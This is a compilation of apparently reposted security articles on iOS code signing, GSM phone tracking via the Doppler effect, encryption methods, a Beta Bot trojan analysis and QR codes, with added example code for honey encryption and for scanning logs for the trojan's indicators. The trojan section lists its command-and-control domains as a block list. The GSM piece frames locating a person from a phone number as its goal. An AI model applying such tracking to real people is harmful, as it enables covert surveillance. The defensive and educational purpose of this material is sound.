In order to develop and install apps on iOS devices, developers must register with Apple and join the iOS Developer Program. The real-world identity of each developer, whether an individual or a business, is verified by Apple before their certificate is issued. This certificate enables developers to sign apps and submit them to the App Store for distribution. As a result, all apps in the App Store have been submitted by an identifiable person or organization, serving as a deterrent to the creation of malicious apps. These apps are further reviewed by Apple to ensure they operate as described and don’t contain obvious bugs or other problems. Apple believes this process would give customers more confidence in the quality of apps they buy. If corporate companies want to use in house apps for their internal purpose, they need to apply for iOS Developer Enterprise program (iDEP). Apple approves applicants after verifying their identity and eligibility. Once an organization becomes a member of iDEP, it can register to obtain a Provisioning Profile. This is the one that permits in-house apps to run on devices it authorizes. Users must have the Provisioning Profile installed in order to run the in-house apps. This ensures that only the organization’s intended users are able to load the apps onto their iOS devices. In-house apps also check to ensure the signature is valid at runtime. Apps with an expired or revoked certificate will not run. This code signing process is depicted in the following figure. Thus we have explored three major security features in iOS – secure boot process, Secure Enclave, and application signing in this article. In the next part, we will look into other security features such as data protection, encryption and so on. ‘Til then, Happy Hacking! Source
  22. GSM or Global System for Mobile Communication is a technology that’s widely used in mobile communications, especially mobile phones. This technology utilizes microwave and signal transmission divided by time, so that the signal information sent will arrive at the destination. The GSM standard for mobile communications as well as mobile technology is deployed more than its counterparts around the world, like CDMA. At this time we will discuss how to track a cell phone by using the Doppler effect; in other words, we will make it easier to know the whereabouts of a person just by having information such as cell phone numbers.

GSM Network Architecture

Typical GSM network architecture is divided into 3 parts:

- Mobile Station (MS)
- Base Station Sub-system (BSS)
- Network Sub-system (NSS)

All elements of the network at the top form a PLMN (Public Land Mobile Network).

Picture 1. GSM network architecture

Mobile Station or MS is a device used by the customer for making phone calls. This device consists of:

- Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user or customer end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices.
- Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without a SIM in it, except for emergency calls. The data stored in the SIM in general are: International Mobile Subscriber Identity (IMSI), Mobile Subscriber ISDN (MSISDN) and the encryption mechanism.

Base Station System or BSS consists of:

- Base Transceiver Station (BTS), a GSM device that is directly related to MS and serves as the sender and receiver.
- Base Station Controller (BSC), a controller device for base stations which is located between the BTS and MSC.

Network Sub System or NSS consists of:

- Mobile Switching Center (MSC), a central network element in a GSM network. The MSC works as the core of a cellular network, where its main role is interconnection, both among the cellular or wired network (PSTN) and with the data network.
- Home Location Register (HLR), a database that saves the data and customer information permanently.
- Visitor Location Register (VLR), a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves.
- Authentication Center (AuC), which authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer.
- Equipment Identity Registration (EIR), which is often integrated into the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) which are to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones.

GSM Layers

There are 3 layers in the GSM network:

- Layer 1, or the physical layer, for setting the channels.
- Layer 2, or the data-link layer, whose main role is to identify the data that is sent from UM to BTS.
- Layer 3 consists of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC), which serve as regulators for radio, mobile management and call control.

Picture 2. Illustration of how GSM works

- The mobile phone is input with the destination number and connects to the nearest BTS.
- BSC and BTS send to MSC and proceed to AuC for checking the user identification.
- MSC proceeds to the HLR / VLR to check for the existence of the mobile phone.
- BSC and MSC proceed to the nearest BTS where the destination mobile is located.

How Doppler Works

Doppler is a change in the frequency or wavelength of a wave source that is received by the observer. This is the Doppler effect formula which is not affected by wind:

Doppler effect formula which is influenced by the wind:

This is the illustration of the Doppler effect:

Picture 3. Doppler effect illustration

From the above picture, there are 3 persons: A, B and C. A is the person in the middle who could detect the source of the wave/sound from B or C. Because the wave/sound that came from B or C travels at a certain frequency and distance, person A could distinguish the source of the wave/sound.

Concept

In this article, we are proposing a GSM radar using the Doppler effect, where the Doppler effect itself will be used to listen for the mobile phone uplink. There is some literature and there are references that mention the Doppler effect being used to identify a signal if the Doppler effect is combined with the right filter processing according to the characteristic of the signal being transmitted.

Research

1. OpenBTS Installation

This article won’t go step by step through the OpenBTS installation until it could be used, because there are already a lot of tutorials which cover the installation process. For this research, we are using USRP N200 from Ettus Research. But as we proceed using OpenBTS with USRP N200, we realize that there is an anomaly in the signal transmitted by USRP N200. So, we are using a spectrum analyzer to figure out and find a solution for the signal anomaly. This is the setup we are using:

Picture 4. Using spectrum analyzer to figure out USRP N200 signal anomaly

Picture 5. Signal anomaly as seen on spectrum analyzer

As you can see from the picture above, the signal generated by USRP N200 looks like a horn and the noise is quite high. The possible cause for that anomaly is that the USRP N200 clock is not accurate, and the solution for that is adding a filter, so the final result will be a correct GSM modulation like this picture:

Picture 6. Correct GSM modulation after adding a filter

2. Doppler Design

After doing some research on Doppler design, we found out that some designs are not capable of a frequency of 900 MHz, but we have a workaround and modified an existing Doppler design so it is capable of reaching 900 MHz and even higher. This is the block diagram for the modified Doppler design (courtesy of Ramsey):

Picture 7. Modified Doppler design

Picture 8. Tracking mobile phone illustration

Conclusion

From the above explanation, we could conclude that the Doppler effect could be used to look up the position of a device transmitting a signal at a certain frequency. We could take this research further to detect any kind of living creature (e.g. endangered species) that in some way is transmitting a signal at a certain frequency, as long as we have the sound sample of that creature.

Source
  23. Keeping personal information secure and protected remains a top priority for computer users who now rely heavily on information systems to manage a large part of their personal and business lives. One of the ways to make sure only authorized users have access to information is the use of encryption, a process that transforms data from “cleartext to ciphertext” and back as a means to keep it secret from others. This is done through a combination of hardware- and software-based encryption. The scope is always the prevention of unintended data leakage. The wide variety of types of encryption available (e.g., symmetric and asymmetric encryption, hardware-based or software-based) can make a person uncertain about which one is best suited to their needs. Each of the cryptographic systems addresses specific aspects of keeping systems secure, so it is important to identify which one is the most appropriate for the situation.

This article surveys how to gain cryptographic data protection with a variety of methods and mechanisms for the sake of digital privacy as well as solutions for data-at-rest and data-in-motion. It also discusses new encryption techniques.

The Need of Encryption for Data Protection

Encryption is a necessity for organizations and users that handle sensitive data. Data ought to be secured for the entire duration of their lifecycle (at-rest, in-transit and in-use). Whether they are at rest in storage and databases on site or backed up in a cloud, whether they are sent to end users within organizations or remotely accessed through mobile devices, all data need proper protection and ad-hoc solutions. The growing use of mobile devices to access sensitive data and corporate applications along with the use of cloud solutions for software, storage, hardware and services has opened a new world of security problems.

Data loss prevention, security practices and strategies employed (firewalls, IDS, coupled with authentication and access controls) in addition to encryption tools are more important than ever as information is no longer being stored and processed in the safety of companies’ on-site servers and behind firewalls, but is actually being manipulated and transferred through a variety of communication channels. Data protection is nothing new, but it remains a significant challenge for organizations and businesses needing to find better ways to protect user data from unauthorized use. Be it corporate, personal, customer or transaction data, the risk of theft or loss throughout the lifecycle is massive. With data theft caused by employees and external parties on the rise, businesses risk their reputation, lack of regulatory compliance, and, ultimately, loss of clients.

Lack of Encryption

Why encrypt? Since a complex password by itself is no longer good enough as a means to protect corporate or personal data, by encrypting the data exchanged between the client and server, any sensitive information can be sent over a network, such as the Internet, with less risk of being intercepted during transit. Plaintext can be easily intercepted by prying eyes and eavesdroppers when transiting in data streams; information can be stolen or altered. Encryption is an effective way of making sure data remain secure. Data, however, is not just vulnerable when in transit.

Some of the worst data security breaches noted in the 21st century and pertaining to lack of encryption go as far back as 2005, when CardSystems Solutions’ system was hacked and was victim of an SQL Trojan attack; hackers gained access to names and account numbers of more than 40 million card holders. Security reports noted that the company never encrypted the data, thus exposing personal info on all its clients.

Another noteworthy incident occurred in 2006 with a group of hackers taking advantage of a weak data encryption system at TJX Companies Inc. Poor security on the company’s wireless networks had resulted in massive data theft, and 94 million credit cards were exposed. Another instance that shows the human element being the weakest link in the security chain is the case of the U.S. Department of Veterans Affairs’ unencrypted national database theft. Names, social security numbers and other sensitive information were found on a laptop and external hard drive that were both stolen. This episode, also in 2006, affected some 26.5 million veterans, whose personal data was taken in a burglary from a VA analyst’s Maryland home.

A more recent event involved Sony’s PlayStation Network, which had 12 million unencrypted credit card numbers hacked. In 2012, a NASA laptop was stolen; it contained records of sensitive personally identifiable information of employees and contractors. Lately, news has reported an unencrypted, password-protected laptop that was stolen at the Community Technology Alliance containing social security numbers and names of 1,177 people. Another device containing data for 2,800 patients was stolen from Northwestern Memorial Health Care.

Encryption Solutions

As the need for encryption is clear in attempting to ensure the integrity and confidentiality of data, the first decision security professionals need to make is between software-based or hardware-based encryption. Both have pros and cons to be considered and can definitely be applied in a combination of ways to ensure maximum protection according to the users’ needs.

Software-based encryption can be extended to all data, devices, and users in an organization. It works well to secure e-mails, instant messaging, data in transit and web sites. These solutions are normally cheaper and easy to customize and update. Common drawbacks are performance degradation and vulnerabilities linked to those of the operating systems in which they operate. Risks are linked also to the ease of being turned off by users.

Hardware-based solutions are specific to the device they protect. Full drive encryption (FDE) or solutions like self-encrypting drives (SEDs) are an effective approach that simplifies the deployment of security for data at rest and makes it easier for organizations to manage security of data when stored. The advantage of hardware-based solutions is that they bypass many of the typical drawbacks of software-based solutions like performance degradation or vulnerability to attacks aimed at the encryption key stored in memory. Since encryption is available at drive level, this hardware solution is also completely independent of any software or operating system used, and usually cannot be turned off by users. Drawbacks are obvious. Hardware solutions are specific to the devices they protect, and updates can normally be performed only by substituting the device.

The Encryption Process & Protecting Data Today

One of the basic concepts of encryption is the need for keys to encrypt and decrypt the message. The process of encryption is done with two individual keys – a private key and a public key; this is referred to as asymmetric encryption, while symmetric encryption requires using one key for both steps. Encryption simply acts as a form of digital lock that prevents unauthorized users from accessing data. In addition, by adding a signature with a private key, a person can prove his or her own identity and make tampering with the message more difficult. Just like sensitive messages, the key must also be adequately protected, secured and kept hidden from unauthorized users.

A number of encryption methods can be employed to secure data especially when in transit, since that is when they are more vulnerable. The content can be intercepted through some effort of wiretapping or eavesdropping by an intruder. In link-to-link encryption, for example, the message is decrypted at each host as it travels, so it is vulnerable if any of the hosts is not secure. This method works well within an organization, for internal use, where the security of all communication nodes is well known, but might not be the safest method when the message is out in the open.

Lately, much attention has been given to end-to-end encryption. This system allows safety of data by ensuring that only the people that are communicating are able to read the message. No one except the sender and the receiver is able to decrypt the message (not even the Internet provider), which is passed from host to host still encrypted. A renowned German e-mail provider, for example, has implemented the use of this methodology for all its users in an attempt to secure their communication from eavesdropping and intrusion.

As securing information in a datacenter that requires protection for a multi-vendor infrastructure or the cloud is becoming a widespread need, new solutions and techniques had to be developed to render the transmission of data more secure. In most cases, solutions need to be deployed simultaneously on network shares, file services, application and web servers as well as database servers. Techniques like tokenization have been deployed to make sure that data exchanged from different servers and sent to onsite, cloud and mobile end users are still safely handled. In the case of tokenization, for example, data are safely stored and replaced by tokens that are used within an organization to process the information, trigger action and perform tasks. The data never leave their safe storage place and cannot be compromised even if the token is intercepted. This method is extremely helpful when dealing with credit card numbers and financial info in general.

Honey encryption, instead, is a technique that can provide additional security when passwords are used as keys. This is particularly effective against conventional brute-force attacks. The concept is simple; in normal circumstances, when intruders intercept a message and attempt to guess the key that encrypts it, all they can get is a manifestly non-usable response. The result is that the malicious hacker continues to attempt until successful. Honey encryption, devised by Juels and Ristenpart, produces a ciphertext that when decrypted with a number of wrong keys gives a “honey message”, a fake plaintext that satisfies the attacker but does not relinquish any real data. Although effective, honey encryption, obviously, is not helpful when the attacker already has a few of the puzzle pieces (for example the public key associated with the private key) and therefore is useless in the protection of HTTPS certificate keys. The method is, however, effective when protecting, for example, password vaults, collections of passwords protected by one master key.

An interesting technique for the handling of sensitive data in a cloud environment has been designed by Craig Gentry, a researcher from IBM: homomorphic encryption. This form of encryption allows users to store data encrypted in a cloud while still being able to analyze and mine the data. In fact, computations can be performed on the encrypted data in the cloud server, and only the results are decrypted by the end user. This can be used for any data, including, for example, entire collections of e-mails and messages that could be securely worked on without exposing the messages contained within. Although homomorphic encryption has been explored for 30 years, it is thanks to the work of Gentry (since 2008) that finally the system is being perfected and getting close to having practical applications. Although still too slow and requiring a larger-than-practical number of computations, this type of encryption could soon be applied.

DNA Cryptography is another method being explored; it can be defined as hiding data as a DNA sequence. This technique is based on DNA computing designed by the work of Leonard Max Adleman (the A in RSA) beginning in the year 1994. This modus operandi is still in the initial phases of development, but results are promising.

One more is for quantum cryptographic tasks and, in particular, QKD (Quantum Key Distribution). Secure communication is ensured by a random key shared by sender and receiver. The advantage of this method is that, as for all quantum systems, a third party that enters it creates a disturbance that can be noted by the sender and receiver. An eavesdropper would cause the communication to be aborted, as the key would not be shared.

Conclusion

According to data collected by BreachLevelIndex, more than 2 million records per day were breached in the year 2014. It is clear that more and more attention needs to be given to the security of data both at rest and in transit. Coupled with users’ access control, encryption is an effective means of securing sensitive information. Multiple techniques of cryptography are important to ensure data integrity in the three components of the CIA triad (Confidentiality, Integrity, Availability).

Encryption is not just for companies and organizations. Individual users also should consider protecting their own data. With mobile devices now allowing users access to all their sensitive information (personal, financial, even medical) and with the growing use of cloud solutions, it is paramount that encryption is adopted and new techniques developed. Currently, many encryption products are available on the market, some are free, and can suit everyone’s needs. With today’s encryption technologies constantly being developed to deliver enhanced security across a range of channels for private communication and storage, there is no reason why this protective measure should not be applied to safeguard data from hackers who continue to develop sophisticated techniques in the attempt to steal information.

Whatever the data are and wherever they reside, they ought to be safeguarded: password protected and encrypted. Business data needs to be safe and placed in a secure environment. Failure to apply authentication and end-to-end encryption for limited access to data could lead to possible exposure by intruders. Whatever protection may be necessary depends on the assets that are being protected. Often, business requirements and regulatory considerations will dictate what approach is best. Users need to analyze their needs and apply the right products to prevent unauthorized access to information and opt to utilize software and hardware technologies to facilitate the encryption of computers, mobile devices and media.

References

- Allen, L. (2012, August 3). Securing Data on a Moving Target: Self-Encrypting Drives Deliver Top Security, Performance and Manageability. Retrieved from StorageReview.com.
- Juels, A. (2014, January 29). Honey Encryption: Security Beyond the Brute-force Bound. Retrieved from http://pages.cs.wisc.edu/~rist/papers/HoneyEncryptionpre.pdf
- Naone, E. (2011, May/June). Homomorphic Encryption – Making cloud computing more secure. Retrieved from MIT Technology Review.
- Olzak, T. (2010, May 7). Choose Encryption Wisely. Retrieved from “What is Encryption and When Should You Use it to Protect Data and Computers”.
- Paganini, P. (2015, February 20). The Future of Data Security: DNA Cryptography and Cryptosystems. Retrieved from Security Affairs.
- Schneier, B. (2010, June 30). Data at Rest vs. Data in Motion. Retrieved from https://www.schneier.com/blog/archives/2010/06/data_at_rest_vs.html
- Simonite, T. (2014, January 29). “Honey Encryption” Will Bamboozle Attackers with Fake Secrets. Retrieved from http://www.technologyreview.com/news/523746/honey-encryption-will-bamboozle-attackers-with-fake-secrets/

Source
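The honey-encryption idea described in the post above, worked through as an added toy example (not code from the article or from Juels and Ristenpart's paper): a distribution-transforming encoder (DTE) gives each message a slice of a fixed seed space proportional to its assumed probability, so a seed recovered with a wrong password still decodes to a plausible "honey message". The PIN vault, its prior, the salt and the use of PBKDF2 as the password KDF are all assumptions made for the demo.

```python
"""Toy honey encryption over a tiny 'password vault' of PINs (added example).

Encrypt:  seed = DTE.encode(pin)         # uniform within the pin's seed range
          ct   = seed XOR KDF(password)
Decrypt:  pin  = DTE.decode(ct XOR KDF(guess))
A wrong guess yields a uniformly random seed, which the DTE maps to a PIN
drawn from the *prior*, so brute force sees only plausible decoys.
"""
import bisect
import hashlib
import secrets

SEED_BITS = 32
SEED_SPACE = 1 << SEED_BITS

# Constructed message space: a skewed prior over a few PINs, standing in for
# the real-world distribution an adversary would expect to see.
MESSAGE_PRIOR = {
    "1234": 0.40,
    "0000": 0.25,
    "1111": 0.15,
    "2580": 0.12,
    "7391": 0.08,
}


def build_dte(prior):
    """Assign each message a contiguous seed range sized by its probability.

    Returns the message list and the upper bounds of all ranges but the last:
    [0, b0) -> messages[0], [b0, b1) -> messages[1], ..., [b_n, SEED_SPACE).
    """
    messages = list(prior)
    bounds, acc = [], 0.0
    for m in messages[:-1]:
        acc += prior[m]
        bounds.append(int(acc * SEED_SPACE))
    return messages, bounds


MESSAGES, BOUNDS = build_dte(MESSAGE_PRIOR)


def dte_encode(message):
    """Pick a uniformly random seed inside the message's own range."""
    idx = MESSAGES.index(message)
    lo = BOUNDS[idx - 1] if idx > 0 else 0
    hi = BOUNDS[idx] if idx < len(BOUNDS) else SEED_SPACE
    return lo + secrets.randbelow(hi - lo)


def dte_decode(seed):
    """Map any seed in [0, SEED_SPACE) back to the message owning its range."""
    return MESSAGES[bisect.bisect_right(BOUNDS, seed)]


def key_stream(password, salt):
    """Derive SEED_BITS of pad from the password (PBKDF2-HMAC-SHA256, an assumption)."""
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                              100_000, dklen=SEED_BITS // 8)
    return int.from_bytes(raw, "big")


def honey_encrypt(message, password, salt):
    """Ciphertext is the DTE seed XORed with the password-derived pad."""
    return dte_encode(message) ^ key_stream(password, salt)


def honey_decrypt(ciphertext, password, salt):
    """Every password yields *some* valid PIN; only the right one yields the original."""
    return dte_decode(ciphertext ^ key_stream(password, salt))


def brute_force_view(ciphertext, salt, guesses):
    """What an attacker trying candidate passwords sees: one plausible PIN per guess."""
    return {g: honey_decrypt(ciphertext, g, salt) for g in guesses}


if __name__ == "__main__":
    salt = b"constructed-salt"
    ct = honey_encrypt("7391", "correct horse", salt)
    print("owner decrypts:", honey_decrypt(ct, "correct horse", salt))
    print("attacker sees :", brute_force_view(ct, salt, ["letmein", "qwerty", "hunter2"]))
```

Run it a few times: the decoys change with the random seed, but none of them is distinguishable from a real vault entry, which is exactly the property the post describes.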
  24. In this article, I would like to show how an analysis is performed on the Beta Bot trojan to identify its characteristics. The Beta Bot trojan, classified as Troj/Neurevt-A, is a dangerous trojan. This trojan is transferred to the victim machine through a phishing email, and the user downloads the files disguised as a legitimate program. This malicious file, when executed, drops a file in the victim machine, then changes system and browser behaviors and also generates HTTP POST traffic to some malicious domains. Beta Bot has various capabilities, including disabling AV, preventing access to security websites, and changing the settings of the browser. This trojan was initially released as an HTTP bot, and was later enhanced with a wide variety of capabilities, including backdoor functionality. The bot injects itself into almost all user processes to take over the whole system. It also utilizes a mechanism to make use of Windows messages and the registry to coordinate the injected codes. The bot also communicates with its C&C server through HTTP requests. The Beta Bot trojan spreads through USB drives, the messaging platform Skype and phishing emails. Analysis Walkthrough Now let’s see how we can do a detailed analysis on the Beta Bot trojan. First step is to isolate the infected system and analyze the system to find any suspicious files. Upon analysis, we found a suspicious file, crt.exe. The crt.exe file was then uploaded into our automated malware analysis system for deeper analysis and it was able to find malicious traffic to several malicious domains. (DNS request to malicious domains) A list of file manipulations was revealed during automated malware analysis. A malicious file named ‘wfwhhydlr.exe’ that was dropped by Beta Bot was revealed during this analysis. (File creation and modification) Mutexes that were used by the malware were also found during the automated analysis. 
(Mutex list of Beta Bot Trojan) After that, the analysis was carried out on our dedicated malware analysis machine. This machine consists of all the core tools needed to carry out both the static and dynamic analysis. As the first step of manual analysis, static analysis was carried out to find the time stamp of the malware. We were able to find the compile date of the malware sample. The malware was compiled on March 14th, 2013, and a GUI is also associated with this sample. File properties of the Beta Bot trojan) Later, static malware analysis was carried out, and as a first step the malware was checked to find whether it was packed or not. On analysis we found that the malware was packed with UPX packer. (Packer detection of the malware) A manual unpacking process was carried out to unpack the packer using a user mode debugger. Then we dumped the unpacked malware, and Import Address Table was reconstructed. (Debugger view of the malware before UPX unpacking) After the IAT reconstruction, the malware was analyzed using the debugger and found that there is no data available and the all the strings are functions are obfuscated. Thus it has to be suspected that the malware was multipacked, and we found that it was packed with a sophisticated crypter called VBCrypter. Then we came to a conclusion that this Beta Bot malware was multi-packed with a combination of UPX packer and VBCrypt crypter. VBCrypter is written in Visual Basic and it is more sophisticated that usual packers. During the execution of the packed malware, it creates the unpacked code as a child process itself and executes that code in the memory. Thus this type of packed malware will be very difficult to unpack. Crypter detection of the malware) Then a process of steps was carried out in order to decrypt the malware encrypted with VBCrypt. 
A user mode debugger was used for this process and by following a series of steps; the malware was decrypted up to an extent and thus the obfuscated code was retrieved for further analysis. Debugger view of the Beta Bot trojan after UPX unpacking) After decrypting the VBCrypt, it showed up with strings and functions that reveal the activity of the malware. The Beta Bot malware tries to find out the Network Interface Card in the infection machine, in order to find out the network adapter device name. The malware also looks for the computer name of the infected machine. (Debugger view of the decrypted Beta Bot trojan) Also using the debugger analysis, it came to an inference that the Beta Bot trojan also has the capability of deactivating the Task Manager of the infected machine. (Debugger view of the malware) The malware was analyzed through a disassembler, and several multi-language strings were retrieved. This reveals the multi-language capability of the Beta Bot trojan. This malware has the ability to configure and behave according to the geo-location of the victim machine. (Disassembler view of the Beta Bot trojan) Dynamic analysis was carried out by executing the malware within our isolated virtual malware lab. On executing the Beta Bot malware was dropped another executable named vuxrwtqas.exe. This file was dropped in the highworker folder under the Program files folder in C drive. (Files dropped by the Beta Bot trojan) Then registry analysis of the Beta Bot trojan was carried out, and on analysis we found that the malware manipulates the Windows registry setting of the infected machine. Registry values are added in order to carry out the debugging of the major security products like MalwareBytes Spybot, Trendmicro Housecall and Hijackthis. This registry setting can used to debug the startup code of the applications and thus the malware can bypass these security applications and thus can execute in the machine. 
(Registry values added by the Beta Bot trojan) Then packet sniffers were used to study the network behavior of the malware, and we were able to list out several malicious IPs on which the malware were trying to connect. Malicious IPs on which the malware connects) Then the memory analysis of the malware was carried out by executing the malware and taking the dump on the primary memory. On analysis, a large number of trampoline hooks was found. The malware, when executed, hooks almost all the processes in the victim machine and thus takes control of the whole machine. The Beta Bot trojan inserts a trampoline hook on the wuauclt.exe file, and this is a Windows Update AutoUpdate Client which runs as a background process that checks the Microsoft website for updates to the operating system. Thus it can assumed that the malware updates itself or downloads other malicious software by hooking this process. (Trampoline hook by the malware) The Beta Bot trojan, on execution, creates a sub-folder named ‘highworker.{2227A280-3AEA-1069-A2DE- 08002B30309D}’ under %PROGRAM FILES%\ COMMON FILES and creates a file named ‘vuxrwtqas.exe’. The first part of the folder name, ‘highworker’, is obtained from the configuration of the bot. The rest of the strings in the folder name is a special GUID which makes the folder link to the ‘Printers and Faxes’ folder in Windows Explorer, and this folder will act as the initializer when malware restarts. The crt.exe then creates a new file and it exits and this newly created file creates a process of a system application and starts to inject the process. (Folder in which malware is dropped) The dropped file is digitally signed with Texas Instruments Inc., is an American company that designs and makes semiconductors, which it sells to electronics designers and manufacturers globally. Thus we can assume that the file is not genuinely signed. 
(Metadata of the dropped file) Recommendations Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Block peer to peer traffic across the organization. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files. Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media. Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Ensure that your Anti-Virus solution is up to date with latest virus definitions. Ensure that your systems are up to date with the latest available patches. Isolate the compromised system immediately if the malware is found to be present. 
Block traffic to the following domains in your perimeter devices such as Firewalls and IDS/IPS solutions:
highroller.pixnet.to
sbn.pxnet.to
cpstw.santros.ws
ccc.santros.ws

Eradication

The following products can be used to remove the Beta Bot trojan from the infected machine:
Symantec Power Eraser
Kaspersky’s TDSSKILLER
Microsoft’s Malicious Software Removal Tool (MSRT)
Malwarebytes Anti-Malware

Log in to the victim machine in Safe Mode and manually remove the processes crt.exe and vuxrwtqas.exe related to the Beta Bot trojan. Manually delete the registry entries associated with the Beta Bot trojan. Delete the malicious file dropped by the malware, vuxrwtqas.exe, in the ‘highworker.{2227A280-3AEA-1069-A2DE-08002B30309D}’ folder under %PROGRAM FILES%\COMMON FILES.

References
Endpoint, Cloud, Mobile & Virtual Security Solutions | Symantec
Source
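The domains, process names and drop folder listed in the post above are the indicators a defender would actually hunt for. The script below is an added example, not part of the original post or of any vendor tool: it matches those indicators against proxy and process-creation log lines. The log lines, client addresses and host names are constructed sample data, and the log formats (Squid-style access log, Sysmon-style process-creation line) are assumptions chosen for illustration.

```python
"""Added example: hunt for the Beta Bot indicators quoted in the post above.
All log lines below are constructed samples, not real captures."""
import re
from dataclasses import dataclass

# Indicators quoted from the post.
BETA_BOT_DOMAINS = {"highroller.pixnet.to", "sbn.pxnet.to",
                    "cpstw.santros.ws", "ccc.santros.ws"}
BETA_BOT_FILES = {"crt.exe", "vuxrwtqas.exe"}
# Folder the post says the trojan creates under Common Files; the GUID part is
# the 'Printers and Faxes' shell folder CLSID mentioned in the analysis.
BETA_BOT_FOLDER = "highworker.{2227A280-3AEA-1069-A2DE-08002B30309D}"

# Constructed Squid-style access log (hypothetical clients and servers).
SAMPLE_PROXY_LOG = """\
1420070400.123    45 10.0.0.12 TCP_MISS/200 512 GET http://highroller.pixnet.to/gate.php - DIRECT/198.51.100.7 text/html
1420070401.456    30 10.0.0.15 TCP_MISS/200 9000 GET http://www.example.com/ - DIRECT/93.184.216.34 text/html
1420070402.789    12 10.0.0.12 TCP_MISS/200 300 GET http://ccc.santros.ws/ping - DIRECT/198.51.100.8 text/plain
1420070403.000    12 10.0.0.20 TCP_MISS/200 300 GET http://notsantros.ws/ - DIRECT/203.0.113.9 text/plain
"""

# Constructed Sysmon-style process-creation lines (hypothetical hosts/paths).
SAMPLE_PROCESS_LOG = """\
host01 ProcessCreate Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe
host02 ProcessCreate Image=C:\\Program Files\\Common Files\\highworker.{2227A280-3AEA-1069-A2DE-08002B30309D}\\vuxrwtqas.exe ParentImage=C:\\Users\\bob\\Downloads\\crt.exe
"""


@dataclass(frozen=True)
class Hit:
    source: str      # "proxy" or "process"
    client: str      # client IP or host name that produced the line
    indicator: str   # which indicator matched
    line: str        # the raw log line, for the analyst


def host_of(url):
    """Extract the host part of an absolute URL (lower-cased), or None."""
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else None


def scan_proxy_log(text):
    """Flag requests whose host is exactly one of the listed C2 domains.
    Exact matching avoids false hits such as 'notsantros.ws'."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        client, url = parts[2], parts[6]
        host = host_of(url)
        if host in BETA_BOT_DOMAINS:
            hits.append(Hit("proxy", client, host, line))
    return hits


def scan_process_log(text):
    """Flag process creations involving the dropped file names or folder."""
    hits = []
    for line in text.splitlines():
        m = re.search(r"\bImage=(.*?)\s+ParentImage=(.*)$", line)
        if not m:
            continue
        host = line.split()[0]
        for path in m.groups():
            name = path.rsplit("\\", 1)[-1].lower()
            if name in BETA_BOT_FILES or BETA_BOT_FOLDER.lower() in path.lower():
                hits.append(Hit("process", host, name, line))
                break  # one hit per line is enough for triage
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_PROXY_LOG) + scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"[{h.source}] {h.client}: {h.indicator}")
```

On the sample data the proxy scan reports the two requests from 10.0.0.12 and ignores the look-alike host, and the process scan reports host02, where the dropped executable was started from the Printers-and-Faxes-linked folder by crt.exe. Running the same functions over real exports is the cheap first step before the eradication steps listed above.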
25. With the increasing use of smartphones, QR codes are becoming popular. Recently, WhatsApp launched its web version, which needs QR code scanning to access the web version of WhatsApp. So, many people now know what a QR code is, but still more are unaware. It is very similar to the bar code we see on products, but it does not need a different reader. Our smartphone camera can easily read it with the help of a QR code scanner app. Due to fast readability, it is now widely accepted, and the use of QR codes is increasing. With the scan of a QR code, we can perform various tasks which would otherwise need a lot more effort. For example, scan a QR code and save the business card details in your smartphone. This is why people like to use QR code scanning for general tasks. But most users are not aware that QR codes can also be malicious. This is why scammers are now using malicious QR codes for tricking users. In this article, I will discuss QR codes in detail. I will also try to cover all the potential security issues related to QR codes.

QR Codes

A QR code (or Quick Response code) is a matrix bar code which can be read by an imaging device (camera) and then processed to read its data. It was initially developed for the automotive industry in Japan, but now it is being used by many companies. You will be surprised to know that the QR code was invented back in 1994 by Denso Wave. Nowadays QR codes are being used to display text to users, to save vCard contact information to the user’s smartphone, to open a website URL, to code payments, for website login (ex: WhatsApp web login) or to compose an e-mail or text message just by scanning a QR code. QR codes are really useful and help us to complete tasks faster on smartphones. You can quickly open a website just by scanning a QR code and you do not need to manually type the URL in your smartphone. This is why many websites’ poster ads now contain a QR code. Another popular use is on a business card.
Now people also include a QR code in their business cards, so other persons can simply scan the QR code to save the contact details in their smartphone. See the sample QR code below. This is for opening a website.

(QR code for: IT Security Training & Resources by InfoSec Institute)

Scanning the above QR code will open IT Security Training & Resources by InfoSec Institute.

How to Generate QR Codes

There are various tools available for this. If you want to generate a QR code with specific information, you can use these tools, which let you create a QR code for URL, text, vCard, SMS, call, geo-location, event, email and login. Different tools have different abilities. A few good QR code generator tools are:
https://www.the-qrcode-generator.com/
QR Code Generator – create QR codes for free (Logo, T-Shirt, vCard, EPS)
QR Code Generator - Create QR codes here
http://www.qrstuff.com/
https://scan.me/qr-code-generator

You can use any of the above tools to generate your own QR code.

Lifespan of QR codes

This is a question about QR codes people generally ask. A QR code does not need any platform for redirection, but it has data within it. Once a QR code is generated, it can be used anytime, anywhere. The lifespan of QR codes is unlimited, so you do not need to worry about lifespan. Generate and then use.

Can QR codes be hacked?

